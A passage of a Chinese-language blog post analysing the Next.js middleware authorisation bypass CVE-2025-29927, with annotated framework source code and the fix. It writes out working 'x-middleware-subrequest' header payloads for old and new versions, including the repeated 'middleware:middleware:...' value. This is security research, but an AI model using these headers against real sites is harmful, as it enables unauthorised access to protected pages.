class="hljs-comment">// 遍历中间件响应的所有头部信息</span><br>            <span class="hljs-keyword">for</span> (let [key, value] of result.response.headers) &#123;<br>                <span class="hljs-comment">// 排除 &#x27;x-middleware-next&#x27; 头部，将其他头部信息添加到 allHeaders 中</span><br>                <span class="hljs-keyword">if</span> (key!== <span class="hljs-string">&#x27;x-middleware-next&#x27;</span>) &#123;<br>                    allHeaders.append(key, value);<br>                &#125;<br>            &#125;<br><br>            <span class="hljs-keyword">if</span> (!<span class="hljs-keyword">this</span>.renderOpts.dev) &#123;<br>                <span class="hljs-comment">// 在非开发环境下，捕获中间件异步操作的错误并输出错误信息</span><br>                result.waitUntil.<span class="hljs-keyword">catch</span>((error) =&gt; &#123;<br>                    console.error(`Uncaught: middleware waitUntil errored`, error);<br>                &#125;);<br>            &#125;<br><br>            <span class="hljs-comment">// 检查中间件响应头中是否包含 &#x27;x-middleware-next&#x27;</span><br>            <span class="hljs-keyword">if</span> (!result.response.headers.has(<span class="hljs-string">&#x27;x-middleware-next&#x27;</span>)) &#123;<br>                <span class="hljs-comment">// 如果不包含，说明不需要继续执行后续中间件，跳出循环</span><br>                <span class="hljs-keyword">break</span>;<br>            &#125;<br>        &#125;<br>    &#125;<br><br>    <span class="hljs-comment">// 如果没有任何中间件产生结果</span><br>    <span class="hljs-keyword">if</span> (!result) &#123;<br>        <span class="hljs-comment">// 渲染 404 页面</span><br>        <span class="hljs-keyword">this</span>.render404(params.request, params.response, params.parsed);<br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-comment">// 将合并后的头部信息设置到最终结果的响应头中</span><br>        <span class="hljs-keyword">for</span> (let [key, value] of allHeaders) &#123;<br>            result.response.headers.<span class="hljs-keyword">set</span>(key, value);<br>        &#125;<br>    &#125;<br><br>    <span class="hljs-comment">// 返回最终的中间件运行结果</span><br>    <span class="hljs-keyword">return</span> result;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>该框架的旧版本（v12.0.7）存在一段代码</p>
<p>1.当 next.js 应用程序使用中间件时，将使用runMiddleware函数<br>2.runMiddleware函数会检索x-middleware-subrequest头的Value<br>	使用Value来判断是否需要应用中间件</p>
<p>1.具体而言：x-middleware-subrequest头的Value被拆分并使用:作为分隔符创建一个列表<br>2.检查此列表是否包含middlewareInfo.name值<br>3.这意味着，如果我们将有正确Value的x-middleware-subrequest头添加到请求中，中间件将被完全忽略，并且请求将通过转发NextResponse.next()并成功访问路径，而中间件不会对其产生任何影响。</p>
<p>为了成功未授权访问，x-middleware-subrequest的Value必须包含middlewareInfo.name</p>
<h4 id="1-middlewareInfo-name"><a href="#1-middlewareInfo-name" class="headerlink" title="1.middlewareInfo.name"></a>1.middlewareInfo.name</h4><p>middlewareInfo.name的值完全可以猜测，它只是中间件所在的路径。要知道这一点，有必要快速了解一下旧版本中中间件的配置方式。</p>
<p>首先，在版本 12.2之前，该文件必须命名为 _middleware.ts。</p>
<p>此外，approuter 仅在 Next.js 版本 13 中发布。此前唯一存在的 router 就是 pages router ，因此该文件必须放在pages文件夹中（router specific）。</p>
<p>这些信息使我们能够推断出中间件的确切路径，从而猜测出x-middleware-subrequest头的值，后者仅由目录名称和文件名称组成，遵循当时的约定，以下划线开头：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">x-middleware-subrequest: pages/_middleware<br></code></pre></td></tr></table></figure>

<p>这样便可以完全绕过中间件，从而绕过任何基于它的保护系统</p>
<p>但还需要考虑执行顺序问题</p>
<h4 id="2-执行顺序"><a href="#2-执行顺序" class="headerlink" title="2.执行顺序"></a>2.执行顺序</h4><p>12.2 之前的版本允许嵌套路由将一个或多个<code>_middleware</code>文件放置在树中的任何位置（从<code>pages</code>文件夹开始），并且具有执行顺序</p>
<p><img src="/images/next.js/9a2d3e47f55c82a44d04345781818f58.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>因此，要获得对<code>/dashboard/panel/admin</code>（受中间件保护的）的访问权限，关于<code>middlewareInfo.name</code>的值有三种可能性，因此 <code>x-middleware-subrequest</code> 的值也有三种可能性：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">pages/_middleware<br><br>pages/dashboard/_middleware<br><br>pages/dashboard/panel/_middleware<br></code></pre></td></tr></table></figure>

<h3 id="新版本代码-12-2之后"><a href="#新版本代码-12-2之后" class="headerlink" title="新版本代码 - 12.2之后"></a>新版本代码 - 12.2之后</h3><p>从版本 12.2 开始，该文件不再包含下划线，而必须简单地命名为<code>middleware.ts</code></p>
<p>此外，它不能再位于 <code>pages</code> 文件夹中</p>
<p>1.有效Payload：</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs css"><span class="hljs-attribute">x</span>-middleware-subrequest: middleware<br></code></pre></td></tr></table></figure>

<p>2.&#x2F;src 目录</p>
<p>还应该考虑到 Next.js 提供了创建<code>/src</code>目录的可能性</p>
<p>除了在项目根目录中放置特殊的 Next.js 应用程序或页面目录外，Next.js 还支持将应用程序代码放置在 src 目录下的常见模式。<a target="_blank" rel="noopener" href="https://nextjs.org/docs/app/building-your-application/configuring/src-directory">Next.js文档</a></p>
<p>在这种情况下，有效Payload将是：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">x-middleware-subrequest: src/middleware<br></code></pre></td></tr></table></figure>

<p>因此，无论路径有多少层，总共只有两种可能性</p>
<h4 id="新版本逻辑变动代码"><a href="#新版本逻辑变动代码" class="headerlink" title="新版本逻辑变动代码"></a>新版本逻辑变动代码</h4><p><img src="/images/next.js/image-20250410102039484.png" srcset="/img/loading.gif" lazyload alt="image-20250410102039484"></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-comment">/**</span><br><span class="hljs-comment"> * 导出一个异步函数 `run`，它使用 `withTaggedErrors` 包装，目的是为错误添加标签以便于调试和追踪。</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@param</span> <span class="hljs-variable">params</span> - 运行中间件所需的参数对象。</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@returns</span> 一个 Promise，解析为中间件运行的结果。</span><br><span class="hljs-comment"> */</span><br><span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> run = <span class="hljs-title function_">withTaggedErrors</span>(<span class="hljs-keyword">async</span> <span class="hljs-keyword">function</span> <span class="hljs-title function_">runWithTaggedErrors</span>(<span class="hljs-params">params</span>) &#123;<br>    <span class="hljs-comment">// 调用 `getRuntimeContext` 函数获取运行时上下文，该上下文包含了中间件运行所需的环境信息等。</span><br>    <span class="hljs-comment">// 此操作是异步的，会等待结果返回后再继续执行后续代码。</span><br>    <span class="hljs-keyword">const</span> runtime = <span class="hljs-keyword">await</span> <span class="hljs-title function_">getRuntimeContext</span>(params);<br><br>    <span class="hljs-comment">// 从请求头中获取 `x-middleware-subrequest` 字段的值。</span><br>    <span class="hljs-comment">// 这个字段可能包含了需要跳过执行的中间件名称列表，也可能用于记录递归调用的中间件信息。</span><br>    <span class="hljs-keyword">const</span> subreq = params.<span class="hljs-property">request</span>.<span class="hljs-property">headers</span>[<span class="hljs-string">`x-middleware-subrequest`</span>];<br><br>    <span class="hljs-comment">// 判断 `subreq` 是否为字符串类型。</span><br>    <span class="hljs-comment">// 如果是字符串，则按冒号 `:` 分割成数组；如果不是字符串，则将 `subrequests` 设为空数组。</span><br>    <span class="hljs-comment">// 这样做是为了将可能存在的多个中间件名称解析出来。</span><br>    <span class="hljs-keyword">const</span> subrequests = <span class="hljs-keyword">typeof</span> subreq === <span class="hljs-string">&#x27;string&#x27;</span> ? subreq.<span class="hljs-title function_">split</span>(<span class="hljs-string">&#x27;:&#x27;</span>) : [];<br><br>    <span class="hljs-comment">// 定义最大递归深度，用于限制中间件递归调用的次数，避免无限递归导致栈溢出。</span><br>    <span class="hljs-keyword">const</span> <span class="hljs-variable constant_">MAX_RECURSION_DEPTH</span> = <span class="hljs-number">5</span>;<br><br>    <span class="hljs-comment">// 计算当前中间件在 `subrequests` 数组中出现的次数，即递归调用的深度。</span><br>    <span class="hljs-comment">// `reduce` 方法会遍历 `subrequests` 数组，对于每个元素，如果其等于当前中间件的名称 `params.name`，则累加器 `acc` 加 1。</span><br>    <span class="hljs-keyword">const</span> depth = subrequests.<span class="hljs-title function_">reduce</span>(<br>        <span class="hljs-function">(<span class="hljs-params">acc, curr</span>) =&gt;</span> (curr === params.<span class="hljs-property">name</span> ? acc + <span class="hljs-number">1</span> : acc),<br>        <span class="hljs-number">0</span><br>    );<br>&#125;);<br></code></pre></td></tr></table></figure>

<p>常量depth的值必须大于或等于常量MAX_RECURSION_DEPTH的值 （即5）</p>
<p>每当subrequests（即用:分隔的Value的列表）中的其中一个Value等于中间件路径即params.name时，常量depth就会加 1</p>
<p>而params.name跟之前一样，只有两种可能性：middleware&#x2F;src&#x2F;middleware</p>
<p>因此，我们只需要在请求中添加以下标头&#x2F;值即可绕过中间件：</p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs less"><span class="hljs-attribute">x-middleware-subrequest</span>: <span class="hljs-attribute">middleware</span>:<span class="hljs-attribute">middleware</span>:<span class="hljs-attribute">middleware</span>:<span class="hljs-attribute">middleware</span>:middleware<br></code></pre></td></tr></table></figure>

<p>或</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware<br></code></pre></td></tr></table></figure>

<p>payload解释：这是<a target="_blank" rel="noopener" href="https://nextjs.org/blog/cve-2025-29927">为了防止递归请求</a>陷入无限循环。</p>
<h2 id="漏洞修复"><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><p>升级到不受影响版本</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/Dalock/article/details/146492231">Next.js 中间件鉴权绕过漏洞 (CVE-2025-29927) 复现利用与原理分析_cve-2025-29927复现-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/vercel/next.js">vercel&#x2F;next.js: The React Framework</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="category-chain-item">漏洞复现</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/next-js-%E4%B8%AD%E9%97%B4%E4%BB%B6%E9%89%B4%E6%9D%83%E7%BB%95%E8%BF%87/" class="print-no-link">#next.js-中间件鉴权绕过</a>
      
        <a href="/tags/CVE-2025-29927/" class="print-no-link">#CVE-2025-29927</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>next.js-中间件鉴权绕过漏洞</div>
      <div>https://ydnd.github.io/2025/04/10/next.js-中间件鉴权绕过漏洞/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>IE</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>April 10, 2025</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/05/19/hello-world/" title="Hello World">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Hello World</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/04/03/ssrf-vul-for-new/" title="ssrf-vul-for-new">
                        <span class="hidden-mobile">ssrf-vul-for-new</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
      
<i class="iconfont icon-love"></i> <a href="" target="_blank" rel="nofollow noopener"><span>100%IEeee</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
